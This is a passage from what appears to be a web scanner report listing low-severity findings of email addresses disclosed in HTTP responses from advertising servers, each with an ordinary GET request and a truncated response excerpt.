Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 02:27:07 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.3.3
Content-Length: 1161
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="t
...[SNIP]...
<p>please contact Pattanij(Pook) E-mail:pattanijk@bangkokpost.co.th Tel.(662)240-3700 #1909</p>
...[SNIP]...

25.2. http://adserver.adtechus.com/adrawdata/3.0/5108.1/1446938/0/0/ADTECH  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /adrawdata/3.0/5108.1/1446938/0/0/ADTECH

Issue detail

The following email address was disclosed in the response:

Request

GET /adrawdata/3.0/5108.1/1446938/0/0/ADTECH;kvinvtype=display;kvrid=1323243821bd3a2334d85d82f0661701;kvexpandable=1;kvdim=twig;kvbw=0;kvpid=1446938;kvgm=100;kva2534=100;kva2544=100;kva1834=100;kvagt18=100;kvagt25=100;kvagt35=100 HTTP/1.1
Host: adserver.adtechus.com
Proxy-Connection: keep-alive
Referer: http://core.videoegg.com/eap/14533/html/swf/AdManager.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4E5FAC086E651A4418BD90FFF001676A

Response

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 14662

<!-- 00.00000 -->
<adFrames version="2.1" type="adFramesV2" ccid="1827986-1" rev="12033:12037MP" path="invtype=display;rid=1323243821bd3a2334d85d82f0661701;expandable=1;dim=twig;bw=0;pid=1446938;gm=1
...[SNIP]...
<url>mailto:contact@videoegg.com?subject=ref: 1827986-1 Ad Experience</url>
...[SNIP]...

25.3. http://advertising.aol.com/finish/0/4/1/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /finish/0/4/1/

Issue detail

The following email address was disclosed in the response:

Request

GET /finish/0/4/1/ HTTP/1.1
Host: advertising.aol.com
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=4
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 11:35:56 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Cache-Control: max-age=1
Expires: Sun, 04 Sep 2011 11:35:57 GMT
ntCoent-Length: 682
Content-Type: text/html; charset=iso-8859-1
Content-Length: 682

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>200 OK</title>
</head><body>
<h1>OK</h1>
<p>The server encountered an internal error or
misconfiguration and was unable to comple
...[SNIP]...
<p>Please contact the server administrator,
you@example.com and inform them of the time the error occurred,
and anything you might have done that may have
caused the error.</p>
...[SNIP]...

25.4. http://advertising.aol.com/finish/1/4/1/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /finish/1/4/1/

Issue detail

The following email address was disclosed in the response:

Request

GET /finish/1/4/1/ HTTP/1.1
Host: advertising.aol.com
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=4
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 11:35:43 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Cache-Control: max-age=1
Expires: Sun, 04 Sep 2011 11:35:44 GMT
ntCoent-Length: 682
Content-Type: text/html; charset=iso-8859-1
Content-Length: 682

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>200 OK</title>
</head><body>
<h1>OK</h1>
<p>The server encountered an internal error or
misconfiguration and was unable to comple
...[SNIP]...
<p>Please contact the server administrator,
you@example.com and inform them of the time the error occurred,
and anything you might have done that may have
caused the error.</p>
...[SNIP]...

25.5. http://advertising.aol.com/finish/2/4/1/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /finish/2/4/1/

Issue detail

The following email address was disclosed in the response:

Request

GET /finish/2/4/1/ HTTP/1.1
Host: advertising.aol.com
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=4
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 11:36:32 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Cache-Control: max-age=1
Expires: Sun, 04 Sep 2011 11:36:33 GMT
ntCoent-Length: 682
Content-Type: text/html; charset=iso-8859-1
Content-Length: 682

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>200 OK</title>
</head><body>
<h1>OK</h1>
<p>The server encountered an internal error or
misconfiguration and was unable to comple
...[SNIP]...
<p>Please contact the server administrator,
you@example.com and inform them of the time the error occurred,
and anything you might have done that may have
caused the error.</p>
...[SNIP]...

25.6. http://advertising.aol.com/finish/3/4/1/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /finish/3/4/1/

Issue detail

The following email address was disclosed in the response:

Request

GET /finish/3/4/1/ HTTP/1.1
Host: advertising.aol.com
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=4
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 11:35:50 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Cache-Control: max-age=1
Expires: Sun, 04 Sep 2011 11:35:51 GMT
ntCoent-Length: 682
Content-Type: text/html; charset=iso-8859-1
Content-Length: 682

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>200 OK</title>
</head><body>
<h1>OK</h1>
<p>The server encountered an internal error or
misconfiguration and was unable to comple
...[SNIP]...
<p>Please contact the server administrator,
you@example.com and inform them of the time the error occurred,
and anything you might have done that may have
caused the error.</p>
...[SNIP]...

25.7. http://advertising.aol.com/finish/4/4/1/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /finish/4/4/1/

Issue detail

The following email address was disclosed in the response:

Request

GET /finish/4/4/1/ HTTP/1.1
Host: advertising.aol.com
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=4
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 11:34:54 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Cache-Control: max-age=1
Expires: Sun, 04 Sep 2011 11:34:55 GMT
ntCoent-Length: 682
Content-Type: text/html; charset=iso-8859-1
Content-Length: 682

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>200 OK</title>
</head><body>
<h1>OK</h1>
<p>The server encountered an internal error or
misconfiguration and was unable to comple
...[SNIP]...
<p>Please contact the server administrator,
you@example.com and inform them of the time the error occurred,
and anything you might have done that may have
caused the error.</p>
...[SNIP]...

25.8. http://advertising.aol.com/finish/5/4/1/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /finish/5/4/1/

Issue detail

The following email address was disclosed in the response:

Request

GET /finish/5/4/1/ HTTP/1.1
Host: advertising.aol.com
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=4
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 11:35:35 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Cache-Control: max-age=1
Expires: Sun, 04 Sep 2011 11:35:36 GMT
ntCoent-Length: 682
Content-Type: text/html; charset=iso-8859-1
Content-Length: 682

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>200 OK</title>
</head><body>
<h1>OK</h1>
<p>The server encountered an internal error or
misconfiguration and was unable to comple
...[SNIP]...
<p>Please contact the server administrator,
you@example.com and inform them of the time the error occurred,
and anything you might have done that may have
caused the error.</p>
...[SNIP]...

25.9. http://advertising.aol.com/finish/6/4/1/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /finish/6/4/1/

Issue detail

The following email address was disclosed in the response:

Request

GET /finish/6/4/1/ HTTP/1.1
Host: advertising.aol.com
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=4
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 11:36:21 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Cache-Control: max-age=1
Expires: Sun, 04 Sep 2011 11:36:22 GMT
ntCoent-Length: 682
Content-Type: text/html; charset=iso-8859-1
Content-Length: 682

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>200 OK</title>
</head><body>
<h1>OK</h1>
<p>The server encountered an internal error or
misconfiguration and was unable to comple
...[SNIP]...
<p>Please contact the server administrator,
you@example.com and inform them of the time the error occurred,
and anything you might have done that may have
caused the error.</p>
...[SNIP]...

25.10. http://advertising.aol.com/finish/7/4/1/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /finish/7/4/1/

Issue detail

The following email address was disclosed in the response:

Request

GET /finish/7/4/1/ HTTP/1.1
Host: advertising.aol.com
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=4
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 11:35:40 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Cache-Control: max-age=1
Expires: Sun, 04 Sep 2011 11:35:41 GMT
ntCoent-Length: 682
Content-Type: text/html; charset=iso-8859-1
Content-Length: 682

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>200 OK</title>
</head><body>
<h1>OK</h1>
<p>The server encountered an internal error or
misconfiguration and was unable to comple
...[SNIP]...
<p>Please contact the server administrator,
you@example.com and inform them of the time the error occurred,
and anything you might have done that may have
caused the error.</p>
...[SNIP]...

25.11. http://advertising.aol.com/finish/8/4/1/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /finish/8/4/1/

Issue detail

The following email address was disclosed in the response:

Request

GET /finish/8/4/1/ HTTP/1.1
Host: advertising.aol.com
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=4
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 11:36:23 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Cache-Control: max-age=1
Expires: Sun, 04 Sep 2011 11:36:24 GMT
ntCoent-Length: 682
Content-Type: text/html; charset=iso-8859-1
Content-Length: 682

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>200 OK</title>
</head><body>
<h1>OK</h1>
<p>The server encountered an internal error or
misconfiguration and was unable to comple
...[SNIP]...
<p>Please contact the server administrator,
you@example.com and inform them of the time the error occurred,
and anything you might have done that may have
caused the error.</p>
...[SNIP]...

25.12. http://advertising.aol.com/token/0/2/1170877546/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /token/0/2/1170877546/

Issue detail

The following email address was disclosed in the response:

Request

GET /token/0/2/1170877546/ HTTP/1.1
Host: advertising.aol.com
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 11:09:09 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Cache-Control: max-age=1
Expires: Sun, 04 Sep 2011 11:09:10 GMT
ntCoent-Length: 682
Content-Type: text/html; charset=iso-8859-1
Content-Length: 682

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>200 OK</title>
</head><body>
<h1>OK</h1>
<p>The server encountered an internal error or
misconfiguration and was unable to comple
...[SNIP]...
<p>Please contact the server administrator,
you@example.com and inform them of the time the error occurred,
and anything you might have done that may have
caused the error.</p>
...[SNIP]...

25.13. http://advertising.aol.com/token/0/3/1885310732/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /token/0/3/1885310732/

Issue detail

The following email address was disclosed in the response:

Request

GET /token/0/3/1885310732/ HTTP/1.1
Host: advertising.aol.com
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 11:48:01 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Cache-Control: max-age=1
Expires: Sun, 04 Sep 2011 11:48:02 GMT
ntCoent-Length: 682
Content-Type: text/html; charset=iso-8859-1
Content-Length: 682

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>200 OK</title>
</head><body>
<h1>OK</h1>
<p>The server encountered an internal error or
misconfiguration and was unable to comple
...[SNIP]...
<p>Please contact the server administrator,
you@example.com and inform them of the time the error occurred,
and anything you might have done that may have
caused the error.</p>
...[SNIP]...

25.14. http://advertising.aol.com/token/1/1/1462706141/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /token/1/1/1462706141/

Issue detail

The following email address was disclosed in the response:

Request

GET /token/1/1/1462706141/ HTTP/1.1
Host: advertising.aol.com
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 11:11:08 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Cache-Control: max-age=1
Expires: Sun, 04 Sep 2011 11:11:09 GMT
ntCoent-Length: 682
Content-Type: text/html; charset=iso-8859-1
Content-Length: 682

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>200 OK</title>
</head><body>
<h1>OK</h1>
<p>The server encountered an internal error or
misconfiguration and was unable to comple
...[SNIP]...
<p>Please contact the server administrator,
you@example.com and inform them of the time the error occurred,
and anything you might have done that may have
caused the error.</p>
...[SNIP]...

25.15. http://advertising.aol.com/token/1/3/1308197307/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /token/1/3/1308197307/

Issue detail

The following email address was disclosed in the response:

Request

GET /token/1/3/1308197307/ HTTP/1.1
Host: advertising.aol.com
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 11:47:52 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Cache-Control: max-age=1
Expires: Sun, 04 Sep 2011 11:47:53 GMT
ntCoent-Length: 682
Content-Type: text/html; charset=iso-8859-1
Content-Length: 682

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>200 OK</title>
</head><body>
<h1>OK</h1>
<p>The server encountered an internal error or
misconfiguration and was unable to comple
...[SNIP]...
<p>Please contact the server administrator,
you@example.com and inform them of the time the error occurred,
and anything you might have done that may have
caused the error.</p>
...[SNIP]...

25.16. http://advertising.aol.com/token/2/2/2011729621/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /token/2/2/2011729621/

Issue detail

The following email address was disclosed in the response:

Request

GET /token/2/2/2011729621/ HTTP/1.1
Host: advertising.aol.com
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 11:11:52 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Cache-Control: max-age=1
Expires: Sun, 04 Sep 2011 11:11:53 GMT
ntCoent-Length: 682
Content-Type: text/html; charset=iso-8859-1
Content-Length: 682

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>200 OK</title>
</head><body>
<h1>OK</h1>
<p>The server encountered an internal error or
misconfiguration and was unable to comple
...[SNIP]...
<p>Please contact the server administrator,
you@example.com and inform them of the time the error occurred,
and anything you might have done that may have
caused the error.</p>
...[SNIP]...

25.17. http://advertising.aol.com/token/2/3/868831419/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /token/2/3/868831419/

Issue detail

The following email address was disclosed in the response:

Request

GET /token/2/3/868831419/ HTTP/1.1
Host: advertising.aol.com
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 11:49:37 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Cache-Control: max-age=1
Expires: Sun, 04 Sep 2011 11:49:38 GMT
ntCoent-Length: 682
Content-Type: text/html; charset=iso-8859-1
Content-Length: 682

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>200 OK</title>
</head><body>
<h1>OK</h1>
<p>The server encountered an internal error or
misconfiguration and was unable to comple
...[SNIP]...
<p>Please contact the server administrator,
you@example.com and inform them of the time the error occurred,
and anything you might have done that may have
caused the error.</p>
...[SNIP]...

25.18. http://advertising.aol.com/token/3/2/1144859041/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /token/3/2/1144859041/

Issue detail

The following email address was disclosed in the response:

Request

GET /token/3/2/1144859041/ HTTP/1.1
Host: advertising.aol.com
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 11:09:30 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Cache-Control: max-age=1
Expires: Sun, 04 Sep 2011 11:09:31 GMT
ntCoent-Length: 682
Content-Type: text/html; charset=iso-8859-1
Content-Length: 682

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>200 OK</title>
</head><body>
<h1>OK</h1>
<p>The server encountered an internal error or
misconfiguration and was unable to comple
...[SNIP]...
<p>Please contact the server administrator,
you@example.com and inform them of the time the error occurred,
and anything you might have done that may have
caused the error.</p>
...[SNIP]...

25.19. http://advertising.aol.com/token/3/3/963398391/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /token/3/3/963398391/

Issue detail

The following email address was disclosed in the response:

Request

GET /token/3/3/963398391/ HTTP/1.1
Host: advertising.aol.com
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 11:50:15 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Cache-Control: max-age=1
Expires: Sun, 04 Sep 2011 11:50:16 GMT
ntCoent-Length: 682
Content-Type: text/html; charset=iso-8859-1
Content-Length: 682

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>200 OK</title>
</head><body>
<h1>OK</h1>
<p>The server encountered an internal error or
misconfiguration and was unable to comple
...[SNIP]...
<p>Please contact the server administrator,
you@example.com and inform them of the time the error occurred,
and anything you might have done that may have
caused the error.</p>
...[SNIP]...

25.20. http://advertising.aol.com/token/4/1/1214941173/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /token/4/1/1214941173/

Issue detail

The following email address was disclosed in the response:

Request

GET /token/4/1/1214941173/ HTTP/1.1
Host: advertising.aol.com
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 11:11:20 GMT
